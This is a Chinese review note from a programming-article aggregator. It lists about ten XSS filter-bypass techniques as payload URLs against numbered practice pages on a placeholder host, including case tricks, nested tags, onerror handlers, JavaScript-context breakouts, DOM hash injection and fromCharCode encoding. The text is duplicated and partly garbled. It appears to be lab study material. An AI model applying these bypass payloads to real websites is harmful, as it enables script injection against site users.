1、大小写绕过http://target_sys.com/xss/xss04.PHP?name=<Script>alert(1);</Script>2、属性多余http://target_sys.com/xss/xss05.PHP?name=<script<script>>alert(1);</sc</script>ript>3、转换标签http://target_sys.com/xss/xss06.PHP?name=moon<img src=a one rror=alert(1)>4、禁用alerthttp://target_sys.com/xss/xss07.PHP?name=<img src="1" one rror="confirm('xss')">5、Js输出http://target_sys.com/xss/xss08.PHP?name=moon";alert($a)//6、Js过滤输出过滤单引号http://target_sys.com/xss/xss09.PHP?name=moon';alert($a);//7、dom输出http://target_sys.com/xss/xss10.PHP?name=moon#<script>alert(1);</script>http://target_sys.com/xss/xss10.PHP?name=moon#<script>alert(/xss/);</script>hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。substring 从#开始截取后面的部分8、urlxsshttp://target_sys.com/xss/xss11.PHP/" οnsubmit="alert('1')$_SERVER['PHP_SELF'] 9、过滤特殊字符PHP开启gpc之后 单引号(’)、双引号(”)、反斜线()与 Nul(NulL 字符)等字符都会被加上反斜线http://target_sys.com/xss/xss12.PHP?name=<script>alert(1);</script>http://target_sys.com/xss/xss12.PHP?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>10、过滤大小号http://target_sys.com/xss/xss13.PHP?name=moon' οnmοuseοver='JavaScript:alert(1)
一、大小写绕过二、属性多余(一次过滤)三、转换标签四、禁用alert五、5、Js输出六、Js过滤输出(过滤单引号)七、dom输出八、urlxss九、过滤特殊字符PHP开启gpc之后
单引号(’)、双引号(”)、反斜线()与 Nul(NulL 字符)等字符都会被加上反斜线
http://target_sys.com/xss/xss12.PHP?name=<script>alert(1);</script>http://target_sys.com/xss/xss12.PHP?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>
10、过滤大小号
移出鼠标就执行
http://target_sys.com/xss/xss13.PHP?name=moon' οnmοuseοver='JavaScript:alert(1)
总结
以上是内存溢出为你收集整理的【复习】XSS_03_绕过技巧全部内容,希望文章能够帮你解决【复习】XSS_03_绕过技巧所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)